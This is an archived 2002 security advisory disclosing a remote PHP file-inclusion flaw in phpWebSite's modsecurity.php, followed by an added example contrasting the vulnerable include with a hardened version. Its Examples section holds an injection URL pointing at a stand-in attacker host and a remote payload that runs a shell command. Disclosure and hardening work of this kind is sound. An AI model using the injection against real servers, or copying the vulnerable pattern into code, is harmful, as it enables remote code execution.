From: Tim Vandermeersch (Tim.Vandermeersch_at_pandora.be)
Date: Sun Sep 22 2002 - 18:53:59 CDT


    --------------------------------------
    | PHP source injection in phpWebSite |
    --------------------------------------
     
    Product Description
    ===================
    phpWebSite is written in the PHP Programming Language,
    making it ideal for developers to write customized
    plug-ins. PHP is a server side programming language
    that is simple, cross-platform, and fast. It can be
    found at http://phpwebsite.appstate.edu
     
    Tested version
    ==============
    Stable - 0.8.2 (modsecurity.php version < 1.10)

    The Problem
    ===========
    phpWebSite comes with a file called
    modsecurity.php, which looks like this:
     
    -------- modsecurity.php --------
    <?php
     // With PHP's register_globals on, $inc_prefix is pre-set from the
     // request (GET/POST/cookie), so this default only applies when the
     // caller sent no value.
     global $inc_prefix;
     if(!$inc_prefix) {
     ...
     }
     ...
     // Whatever the caller supplied is used as the include prefix; a URL
     // such as http://MYBOX/ makes PHP fetch and execute remote code.
     include_once($inc_prefix."htmlheader.php");
    ?>
    ----------------------------------
     
    If someone requests a URL like
    http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
    the htmlheader.php file from MYBOX would be included,
    and the attacker would be able to include any code he
    wants.
     
    Examples
    ========
    http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
     
    --- htmlheader.php ---
    <?php
    // Hosted on MYBOX; executed on SERVER once included.
    passthru("/bin/ls");
    ?>
    ----------------------

    Output: directory listing of the current directory

    Solution
    =========
    I informed the vendor and they released a new version (1.11)
    of the modsecurity.php file, which is available from:
    http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite

    A new version (0.8.3) has been released, so new users will
    never have a modsecurity.php file older than version 1.11.

    ------------------------------
    Tim Vandermeersch
    Tim.Vandermeersch_at_pandora.be
    http://users.pandora.be/tim/
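The include pattern from the advisory beside a hardened form, as an added example that is not part of the original post and not phpWebSite's own code (the vendor's 1.11 fix is not shown on this page). The directory constant, the file allowlist and the function names are assumptions for illustration.

```php
<?php
// Added example, not phpWebSite's code. Shows why the modsecurity.php
// pattern is exploitable and one way to harden it.

// --- Vulnerable pattern (as in modsecurity.php < 1.10) ---
// With register_globals=On (the PHP default in 2002) a request such as
//   modsecurity.php?inc_prefix=http://MYBOX/
// sets $inc_prefix before this code runs, so the default is skipped and
// PHP fetches and executes http://MYBOX/htmlheader.php.
function vulnerable_include()
{
    global $inc_prefix;
    if (!$inc_prefix) {
        $inc_prefix = './';      // applies only when nothing was injected
    }
    include_once($inc_prefix . 'htmlheader.php');
}

// --- Hardened version (assumed fix, not the vendor's patch) ---
// 1. The include prefix is a deployment constant, never request data.
//    Any inc_prefix in $_GET/$_POST/$_COOKIE is simply ignored.
// 2. Only names from a fixed allowlist may be included, and the resolved
//    path must stay under the application directory.
define('PHPWS_INC_DIR', dirname(__FILE__) . '/');   // assumption

function safe_include_path($file, $base = PHPWS_INC_DIR)
{
    // Assumed allowlist: bare file names only, no slashes or URLs.
    $allowed = array('htmlheader.php', 'htmlfooter.php');
    if (!in_array($file, $allowed, true)) {
        return false;
    }
    $base_real = realpath($base);
    $path_real = realpath($base . $file);
    if ($base_real === false || $path_real === false) {
        return false;            // missing file or unreadable base dir
    }
    // realpath() strips "../" and never yields a URL, so a prefix check on
    // the resolved path is a reliable containment test.
    $base_real = rtrim($base_real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path_real, $base_real, strlen($base_real)) !== 0) {
        return false;            // resolved outside the application dir
    }
    return $path_real;
}

function hardened_include()
{
    $path = safe_include_path('htmlheader.php');
    if ($path === false) {
        header('HTTP/1.0 500 Internal Server Error');
        exit('bad include');
    }
    include_once($path);
}

// Defence in depth, in php.ini (an attacker cannot change these):
//   register_globals = Off   ; request parameters no longer become variables
//   allow_url_fopen  = Off   ; include() cannot fetch http:// URLs at all
// (PHP >= 5.2 adds allow_url_include, which controls includes separately.)
```

The essential change is the first one: the prefix is no longer a variable an HTTP request can populate. The realpath() containment check is defence in depth against later code that builds paths from other untrusted input, and the php.ini settings close the remote-include channel for every script on the host, not just this one.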